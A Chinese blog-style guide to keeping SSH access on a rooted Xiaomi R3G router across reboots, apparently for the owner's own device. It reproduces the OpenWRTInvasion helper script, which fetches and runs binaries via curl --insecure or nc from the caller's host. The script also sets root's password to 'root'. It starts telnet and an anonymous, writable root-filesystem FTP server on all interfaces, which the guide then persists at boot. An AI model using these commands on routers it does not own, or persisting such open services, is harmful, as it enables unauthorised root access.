小米路由器R3G稳定2.28.44 固化SSH
1.SSH
参考恩山论坛的帖子SSH即可
[R3G] R3G 和 R3GV2 解锁 SSH
我做了实验 R3G稳定2.28.44 是可以一键SSH的。
2.固化SSH
帖子中获取 SSH 所用的方法本质上是 OpenWRTInvasion
原理是利用小米路由器的 root shell 漏洞上传二进制文件,进而获取 SSH 及 root 权限
但是所有的二进制文件全部上传于/tmp目录下,而小米路由器在每次重启后都会重置该目录,也就是说重启便会丢失SSH。
当然OpenWRTInvasion项目本来就是通过获取SSH进而刷写不死鸟然后刷到OpenWRT的。
让我们看下相关执行脚本
#!/bin/ash
# Abort on any failing command, on unset variables and on a failing
# pipeline stage. NOTE(review): the shebang selects busybox ash; `pipefail`
# is only honoured by busybox builds that include it — confirm on the target.
set -euo pipefail
#######################################
# Entry point of the OpenWRTInvasion helper: runs the setup steps in a
# fixed order. setup_busybox must precede start_telnet and start_ftp,
# which both execute /tmp/busybox.
# Side effects: replaces root's password and leaves telnetd, ftpd and
# dropbear listening on the device (see the individual functions for the
# exposure each one adds).
# Outputs: "Done exploiting" on stdout when every step succeeded
#######################################
exploit() {
setup_password
setup_busybox
start_telnet
start_ftp
start_ssh
echo "Done exploiting"
}
#######################################
# Download one helper file from the OpenWRTInvasion repository on GitHub.
# Arguments:
#   $1 - file name under script_tools/ in the repository
#   $2 - destination path on the device
# Returns: curl's exit status
# Security note: --insecure disables TLS certificate verification, so the
# downloaded binary is not protected against on-path tampering; verify a
# checksum of the result where possible.
#######################################
download_file_from_github() {
  local name=$1
  local dest=$2
  local base_url='https://github.com/acecilia/OpenWRTInvasion/raw/master/script_tools'
  # Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250
  curl -L "${base_url}/${name}" --insecure --output "${dest}"
}
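#######################################
# Request one helper file from the caller's TCP server: the file name is
# sent as a single line and the reply is written to the destination.
# Host and port come from the CGI environment (REMOTE_ADDR = address of the
# HTTP client, QUERY_STRING = port), i.e. from the HTTP request itself, so
# the port is validated before it is handed to nc.
# Arguments:
#   $1 - file name to request
#   $2 - destination path on the device
# Returns: 1 if QUERY_STRING is not a plain decimal port, else nc's status
#######################################
download_file_from_tcp_server() {
  local name=$1
  local dest=$2
  local host=${REMOTE_ADDR}
  local port=${QUERY_STRING}
  case "${port}" in
    ''|*[!0-9]*)
      printf 'download_file_from_tcp_server: invalid port %s\n' "${port}" >&2
      return 1
      ;;
  esac
  # printf instead of echo: the name is emitted verbatim even if it looks like an echo option
  printf '%s\n' "${name}" | nc "${host}" "${port}" >"${dest}"
}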
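#######################################
# Fetch one helper file into place, choosing the transport from the CGI
# variable QUERY_STRING: "0" downloads from the OpenWRTInvasion GitHub
# repository, any other value is treated as the port of the caller's TCP
# server (see download_file_from_tcp_server). The destination is removed
# first so a stale copy from a previous run is never reused.
# Arguments:
#   $1 - file name as known to the server (e.g. busybox-mipsel)
#   $2 - destination path on the device
# Returns: the status of the selected download function
#######################################
get_file() {
  local src dst
  src=$1
  dst=$2
  rm -rf -- "${dst}"
  case "${QUERY_STRING}" in
    0) download_file_from_github "${src}" "${dst}" ;;
    *) download_file_from_tcp_server "${src}" "${dst}" ;;
  esac
}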
#######################################
# Set root's password to the fixed string "root" (fed twice to passwd).
# Security note: this is a publicly known credential; every host that can
# reach the telnet/ssh listeners started afterwards can log in with it.
# Change it (passwd root) as soon as access is obtained, and before any
# service is persisted across reboots.
#######################################
setup_password() {
# Override existing password, as the default one set by xiaomi is unknown
# https://www.systutorials.com/changing-linux-users-password-in-one-command-line/
echo -e "root\nroot" | passwd root
}
#######################################
# Fetch the busybox-mipsel binary to /tmp/busybox and make it executable.
# Any process named "busybox" is killed first (the telnetd/ftpd started by
# a previous run); `|| true` keeps an empty pgrep result from aborting the
# script. NOTE(review): the name match may also hit unrelated processes of
# that name — confirm on the device.
# /tmp is volatile here, so the binary does not survive a reboot.
#######################################
setup_busybox() {
# kill/stop telnet, in case it is running from a previous execution
pgrep busybox | xargs kill || true
cd /tmp
get_file busybox-mipsel busybox
chmod +x busybox
}
#######################################
# Start busybox ftpd under tcpsvd on 0.0.0.0:21 in the background, serving
# "/" with uploads enabled (-w) and syslog logging (-S); tcpsvd's own
# output goes to /tmp/messages.
# Security note: busybox ftpd is an anonymous server (it does not check
# credentials), so this exposes read/write access to the whole root
# filesystem on every interface the device has (0.0.0.0 includes the WAN
# side unless the firewall blocks port 21). Stop it once the transfer is
# done, and do not carry it into rc.local.
#######################################
start_ftp() {
cd /tmp
ln -sfn busybox ftpd # Create symlink needed for running ftpd
./busybox tcpsvd -vE 0.0.0.0 21 ./ftpd -Sw / >> /tmp/messages 2>&1 &
}
#######################################
# Start busybox telnetd from /tmp on its default port (23).
# Requires setup_busybox to have run first.
# Security note: telnet carries the root/root login set by setup_password
# in cleartext; treat it as a bootstrap-only channel and kill it once SSH
# works.
#######################################
start_telnet() {
cd /tmp
./busybox telnetd
}
#######################################
# Install the bundled static mipsel dropbear under /tmp/dropbear, generate
# new host keys in /etc/dropbear and start the server with default options.
# Side effects: /tmp/dropbear and /etc/dropbear are wiped first, so any
# host keys already stored there are lost and clients that pinned them will
# see a changed key; running dropbear processes are killed.
# Security notes: root can log in with the password set by setup_password
# until it is changed. The dss host key and the client options quoted at
# the end (diffie-hellman-group1-sha1, 3des-cbc) are legacy algorithms,
# presumably required by this dropbear build — scope them to this host in
# ssh_config instead of enabling them globally.
#######################################
start_ssh() {
cd /tmp
# Clean
rm -rf dropbear
rm -rf /etc/dropbear
# kill/stop dropbear, in case it is running from a previous execution
pgrep dropbear | xargs kill || true
# Download dropbear static mipsel binary
get_file dropbearStaticMipsel.tar.bz2 dropbear.tar.bz2
mkdir dropbear
# Use the downloaded busybox's tar; drop the archive's top-level directory
/tmp/busybox tar xvfj dropbear.tar.bz2 -C dropbear --strip-components=1
# Add keys
# http://www.ibiblio.org/elemental/howto/dropbear-ssh.html
mkdir -p /etc/dropbear
cd /etc/dropbear
/tmp/dropbear/dropbearkey -t rsa -f dropbear_rsa_host_key
/tmp/dropbear/dropbearkey -t dss -f dropbear_dss_host_key
# Start SSH server
/tmp/dropbear/dropbear
# https://unix.stackexchange.com/a/402749
# Login with ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc root@192.168.0.21
# (both options weaken the client's algorithm policy; use them for this host only)
}
#######################################
# Make /usr/share/xiaoqiang writable by copying it to /tmp and
# bind-mounting the copy over the original. Copy and mount both live in
# /tmp, so edits vanish on reboot.
# NOTE(review): if /tmp/xiaoqiang already exists (second call), `cp -R`
# copies into it as /tmp/xiaoqiang/xiaoqiang instead of refreshing it —
# confirm before relying on repeated calls.
#######################################
remount() {
echo "Remount /usr/share/xiaoqiang as read-write"
cp -R /usr/share/xiaoqiang /tmp/xiaoqiang
mount --bind /tmp/xiaoqiang /usr/share/xiaoqiang
echo "Done remounting"
}
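# Function inspired by https://openwrt.org/docs/guide-user/installation/generic.backup#create_full_mtd_backup
#######################################
# Dump every MTD partition listed in /proc/mtd to a raw .bin file in
# <dir>/mtd_backup. Nothing is compressed (the device runs out of space
# for that), so no archive is produced.
# Arguments:
#   $1 - directory that receives the mtd_backup folder (default: /tmp);
#        a persistent location such as /userdisk avoids losing the dump
# Outputs: progress lines on stdout
# Returns: non-zero if any dd fails (under set -e/pipefail the loop stops
#          at the first failing partition)
#######################################
mtd_backup() {
  local tmpdir=${1:-/tmp}
  local backup_dir="${tmpdir}/mtd_backup"
  local line dev name
  echo "Start"
  rm -rf "${backup_dir}"
  mkdir -p "${backup_dir}"
  # /proc/mtd starts with a table header, so skip the first line. The rest
  # look like:  mtd0: 00040000 00010000 "Bootloader"
  tail -n +2 /proc/mtd | while IFS= read -r line; do
    dev=${line%%:*}      # up to the first ':'   -> mtd0
    name=${line#*\"}     # drop everything through the opening quote
    name=${name%\"*}     # drop the closing quote and anything after it
    echo "Backing up ${dev} (${name})"
    dd if="/dev/${dev}" of="${backup_dir}/${dev}_${name}.bin"
  done
  # Do not compress, as the device runs out of storage for such operation
  echo "Done backing up"
}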
# From https://stackoverflow.com/a/16159057
# Dispatch: the first argument names the function to run ("exploit",
# "remount", "mtd_backup"); any further arguments are passed through.
# Security note: any name is accepted, including external commands on
# PATH, so whoever supplies the argument list fully controls what runs.
# The functions above read the CGI variables REMOTE_ADDR and QUERY_STRING,
# which suggests this is invoked via the router's web server; treat the
# argument list as untrusted input wherever that path is reachable.
"$@"
可以看到相关二进制全部存放于/tmp目录中,想要固化,本质上就是拷贝到其他目录
1.查看目录结构,选择存放目录
df -h
最终选择存放到/userdisk目录下
2.拷贝dropbear[用于提供ssh]
cp -r /tmp/dropbear/ /userdisk/dropbear/
3.拷贝busybox工具箱
mkdir -p /userdisk/busybox
cp /tmp/busybox /userdisk/busybox/
4.添加启动引导
编辑 /etc/rc.local 文件,添加开机时执行的脚本命令。需要注意要在 exit 0 之前添加:
# ssh support: dropbear started from its persistent copy on /userdisk.
# Security note: root keeps the fixed password set during the exploit
# until it is changed — change it before enabling this. dropbear reads its
# host keys from /etc/dropbear (created by start_ssh); if that directory
# does not survive a reboot, keys must be regenerated here — confirm on
# the device.
/userdisk/dropbear/dropbear
# ftpd support.
# Security note: busybox ftpd is anonymous and "-Sw /" makes the whole root
# filesystem writable over port 21 on every interface (0.0.0.0). Persisting
# it turns a one-off transfer tool into a permanent unauthenticated entry
# point; remove these two lines, or at least bind to the LAN address and
# drop -w, once the files have been copied.
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
# telnetd support: cleartext login, redundant once SSH works — prefer to
# leave it out.
/userdisk/busybox/busybox telnetd
完整文件如下:
# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
# Persistent SSH (dropbear from /userdisk). Security note: change root's
# password from the value set during the exploit before enabling this.
# NOTE(review): rc.local has no error handling; if /userdisk is not yet
# mounted when this runs, the commands below fail silently — confirm.
/userdisk/dropbear/dropbear
# Anonymous, writable ftpd rooted at "/" on all interfaces (0.0.0.0:21):
# a permanent unauthenticated entry point. Remove once files are copied,
# or at least bind to the LAN address and drop -w.
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
# Cleartext telnet login; redundant once SSH works — prefer to leave it out.
/userdisk/busybox/busybox telnetd
# Must stay the last line: everything added above runs before it.
exit 0
3.修改路由器 Banner[非必须]
1.生成
生成地址:http://patorjk.com/software/taag/#p=display&f=Big Money-ne&t=ARE U OK
2.修改
R3G的Banner文件位于/etc/banner